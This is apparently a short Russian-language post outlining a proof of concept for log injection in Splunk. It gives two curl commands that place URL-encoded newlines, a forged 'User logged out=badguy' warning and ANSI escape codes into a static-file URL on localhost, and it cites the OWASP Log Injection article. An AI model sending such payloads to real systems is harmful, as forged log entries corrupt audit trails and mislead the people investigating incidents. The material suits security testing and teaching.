
Proof-of-concept, демонстрирующий инъекцию и отравление журналов в Splunk через специально сформированные параметры URL, подчёркивающий риски OWASP log injection.
я не знаю, я просто читаю то, что друг мне прислал, и начинаю набирать какой-то случайный жалкий код на javascript
Пожалуйста, прочитайте эту статью OWASP Log Injection
Найдите статический файл, передайте его и добавьте случайный параметр
Итак, я передаю curl -k "https://localhost:8000/en-US/static/app/search/application.css%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----" OR curl -k "https://localhost:8000/en-US/static/app/search/application.css%1B[31mANSI_TEST_RED%1B[0m%0Atest%0A%0A%0AWARN%3A%20User%20logged%20out%3Dbadguy%0A----LOG_INJECTION_TEST_12345----"
Если вы видите появление случайной новой строки, это отравление (poisoning). Возможно, это кажется безобидным, потому что это просто «нормальное» отравление, но оно может раздражать, если направлено целенаправленно.